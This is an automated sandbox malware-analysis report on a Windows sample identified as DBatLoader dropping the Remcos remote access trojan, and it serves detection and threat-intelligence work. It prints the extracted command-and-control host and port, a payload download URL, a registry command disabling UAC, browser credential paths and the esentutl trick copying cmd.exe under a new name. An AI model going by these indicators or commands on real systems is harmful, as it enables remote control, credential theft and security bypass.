Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XjPA2pnUhC.exe

Overview

General Information

Sample name:XjPA2pnUhC.exe
renamed because original name is a hash value
Original sample name:bbf710c83246092a538128620853d4fd.exe
Analysis ID:1517948
MD5:bbf710c83246092a538128620853d4fd
SHA1:95338f06c76178de31b5e8453f92c43f970ea9f9
SHA256:7ad64f279e3fa6a7d0ef2916240f1337584c5b5176fb56089771164f2905554f
Tags:exeuser-abuse_ch
Infos:

Detection

Remcos, DBatLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected DBatLoader
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Installs a global keyboard hook
Machine Learning detection for dropped file
Machine Learning detection for sample
Queues an APC in another process (thread injection)
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Creation with Colorcpl
Uses dynamic DNS services
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to launch a process as a different user
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • XjPA2pnUhC.exe (PID: 2780 cmdline: "C:\Users\user\Desktop\XjPA2pnUhC.exe" MD5: BBF710C83246092A538128620853D4FD)
    • cmd.exe (PID: 6388 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\ahhbgzzQ.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 5268 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • esentutl.exe (PID: 7120 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
    • esentutl.exe (PID: 2860 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\Desktop\XjPA2pnUhC.exe /d C:\\Users\\Public\\Libraries\\Qzzgbhha.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
      • conhost.exe (PID: 2472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • colorcpl.exe (PID: 2684 cmdline: C:\Windows\System32\colorcpl.exe MD5: DB71E132EBF1FEB6E93E8A2A0F0C903D)
    • Qzzgbhha.PIF (PID: 6388 cmdline: "C:\Users\Public\Libraries\Qzzgbhha.PIF" MD5: BBF710C83246092A538128620853D4FD)
      • SndVol.exe (PID: 1200 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • Qzzgbhha.PIF (PID: 2000 cmdline: "C:\Users\Public\Libraries\Qzzgbhha.PIF" MD5: BBF710C83246092A538128620853D4FD)
    • SndVol.exe (PID: 1520 cmdline: C:\Windows\System32\SndVol.exe MD5: BD4A1CC3429ED1251E5185A72501839B)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://maan2u.com/doc/233_Qzzgbhhaaml"]}

Threatname: Remcos

{"Host:Port:Password": "apostlejob2.duckdns.org:2468:1192.161.184.44:2468:1", "Assigned name": "Exploit001", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OGO4HJ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
              Click to see the 42 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              10.2.SndVol.exe.2880000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                10.2.SndVol.exe.2880000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  10.2.SndVol.exe.2880000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    10.2.SndVol.exe.2880000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6c4b8:$a1: Remcos restarted by watchdog!
                    • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                    10.2.SndVol.exe.2880000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x6657c:$str_b2: Executing file:
                    • 0x675fc:$str_b3: GetDirectListeningPort
                    • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x67128:$str_b7: \update.vbs
                    • 0x665a4:$str_b9: Downloaded file:
                    • 0x66590:$str_b10: Downloading file:
                    • 0x66634:$str_b12: Failed to upload file:
                    • 0x675c4:$str_b13: StartForward
                    • 0x675e4:$str_b14: StopForward
                    • 0x67080:$str_b15: fso.DeleteFile "
                    • 0x67014:$str_b16: On Error Resume Next
                    • 0x670b0:$str_b17: fso.DeleteFolder "
                    • 0x66624:$str_b18: Uploaded file:
                    • 0x665e4:$str_b19: Unable to delete:
                    • 0x67048:$str_b20: while fso.FileExists("
                    • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 38 entries

                    Sigma Signatures

                    System Summary

                    barindex
                    Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                    Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\Desktop\XjPA2pnUhC.exe, ProcessId: 2780, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                    Sigma detected: Execution from Suspicious Folder
                    Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Qzzgbhha.PIF, NewProcessName: C:\Users\Public\Libraries\Qzzgbhha.PIF, OriginalFileName: C:\Users\Public\Libraries\Qzzgbhha.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , ProcessId: 2000, ProcessName: Qzzgbhha.PIF
                    Sigma detected: New RUN Key Pointing to Suspicious Folder
                    Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Qzzgbhha.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XjPA2pnUhC.exe, ProcessId: 2780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qzzgbhha
                    Sigma detected: Suspicious Creation with Colorcpl
                    Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 2684, TargetFilename: C:\Users\user
                    Sigma detected: CurrentVersion Autorun Keys Modification
                    Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Qzzgbhha.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\XjPA2pnUhC.exe, ProcessId: 2780, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Qzzgbhha
                    Sigma detected: Execution of Suspicious File Type Extension
                    Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\Qzzgbhha.PIF, NewProcessName: C:\Users\Public\Libraries\Qzzgbhha.PIF, OriginalFileName: C:\Users\Public\Libraries\Qzzgbhha.PIF, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Users\Public\Libraries\Qzzgbhha.PIF" , ProcessId: 2000, ProcessName: Qzzgbhha.PIF

                    Stealing of Sensitive Information

                    barindex
                    Sigma detected: Remcos
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\colorcpl.exe, ProcessId: 2684, TargetFilename: C:\ProgramData\remcos\logs.dat

                    Suricata Signatures

                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-25T09:34:42.731337+020020365941Malware Command and Control Activity Detected192.168.2.549706192.161.184.442468TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-09-25T09:34:43.932990+020028033043Unknown Traffic192.168.2.549707178.237.33.5080TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for URL or domain
                    Source: apostlejob2.duckdns.orgAvira URL Cloud: Label: malware
                    Found malware configuration
                    Source: XjPA2pnUhC.exeMalware Configuration Extractor: DBatLoader {"Download Url": ["https://maan2u.com/doc/233_Qzzgbhhaaml"]}
                    Source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "apostlejob2.duckdns.org:2468:1192.161.184.44:2468:1", "Assigned name": "Exploit001", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-OGO4HJ", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
                    Multi AV Scanner detection for dropped file
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFReversingLabs: Detection: 31%
                    Multi AV Scanner detection for submitted file
                    Source: XjPA2pnUhC.exeReversingLabs: Detection: 31%
                    Yara detected Remcos RAT
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000007.00000002.4510115069.0000000000791000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510318610.0000000000CFF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510115069.0000000000728000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2251996048.000000001F0E7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000C.00000002.2330151215.000000002B797000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Machine Learning detection for dropped file
                    Source: C:\Users\Public\Libraries\Qzzgbhha.PIFJoe Sandbox ML: detected
                    Machine Learning detection for sample
                    Source: XjPA2pnUhC.exeJoe Sandbox ML: detected
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FC38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,7_2_02FC38C8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028B38C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,10_2_028B38C8
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030338C8 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,12_2_030338C8
                    Source: XjPA2pnUhC.exeBinary or memory string: -----BEGIN PUBLIC KEY-----

                    Exploits

                    barindex
                    Yara detected UAC Bypass using CMSTP
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 10.2.SndVol.exe.2880000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 7.2.colorcpl.exe.2f90000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 12.2.SndVol.exe.3000000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.XjPA2pnUhC.exe.28f0000.7.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000C.00000002.2306880653.0000000003000000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000A.00000002.2228243300.0000000002880000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2123141116.0000000002977000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2129313765.000000007E9D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000007.00000002.4510477768.0000000002F90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: XjPA2pnUhC.exe PID: 2780, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: colorcpl.exe PID: 2684, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1520, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: SndVol.exe PID: 1200, type: MEMORYSTR

                    Privilege Escalation

                    barindex
                    Contains functionality to bypass UAC (CMSTPLUA)
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F97538 _wcslen,CoGetObject,7_2_02F97538
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_02887538 _wcslen,CoGetObject,10_2_02887538
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03007538 _wcslen,CoGetObject,12_2_03007538
                    Source: XjPA2pnUhC.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                    Source: unknownHTTPS traffic detected: 112.137.173.77:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdb source: XjPA2pnUhC.exe, XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027E7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121019673.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.000000000281A000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2037534198.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027B7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000004.00000003.2102414872.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
                    Source: Binary string: easinvoker.pdbH source: XjPA2pnUhC.exe, 00000000.00000003.2080428104.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2080667872.000000007FCD0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2130094884.000000007F340000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: easinvoker.pdbGCTL source: XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027E7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E621000.00000004.00000020.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2103107001.000000000E650000.00000004.00000020.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121019673.00000000022A6000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.000000000281A000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000003.2037534198.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2121681113.00000000027B7000.00000004.00001000.00020000.00000000.sdmp, XjPA2pnUhC.exe, 00000000.00000002.2122754402.000000000291E000.00000004.00001000.00020000.00000000.sdmp
                    Source: Binary string: cmd.pdb source: esentutl.exe, 00000004.00000003.2102414872.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.4.dr
                    Source: C:\Users\user\Desktop\XjPA2pnUhC.exeCode function: 0_2_028F5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,0_2_028F5908
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_02F9928E
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,7_2_02F9C388
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FAC322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,7_2_02FAC322
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F996A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,7_2_02F996A0
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FA9B86 FindFirstFileW,FindNextFileW,FindNextFileW,7_2_02FA9B86
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,7_2_02F9BB6B
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02FDE8F9 FindFirstFileExA,7_2_02FDE8F9
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F97877 FindFirstFileW,FindNextFileW,7_2_02F97877
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F98847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,7_2_02F98847
                    Source: C:\Windows\SysWOW64\colorcpl.exeCode function: 7_2_02F9BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,7_2_02F9BD72
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0288928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_0288928E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0288C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,10_2_0288C388
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0289C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,10_2_0289C322
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028896A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,10_2_028896A0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_02899B86 FindFirstFileW,FindNextFileW,FindNextFileW,10_2_02899B86
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0288BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,10_2_0288BB6B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_028CE8F9 FindFirstFileExA,10_2_028CE8F9
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_02888847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,10_2_02888847
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_02887877 FindFirstFileW,FindNextFileW,10_2_02887877
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 10_2_0288BD72 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,10_2_0288BD72
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0301C322 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,12_2_0301C322
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0300C388 FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,12_2_0300C388
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0300928E __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_0300928E
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_030096A0 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,12_2_030096A0
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0300BB6B FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,12_2_0300BB6B
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03019B86 FindFirstFileW,FindNextFileW,FindNextFileW,12_2_03019B86
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03008847 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,12_2_03008847
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_03007877 FindFirstFileW,FindNextFileW,12_2_03007877
                    Source: C:\Windows\SysWOW64\SndVol.exeCode function: 12_2_0304E8F9 FindFirstFileExA,12_2_0304E8F9
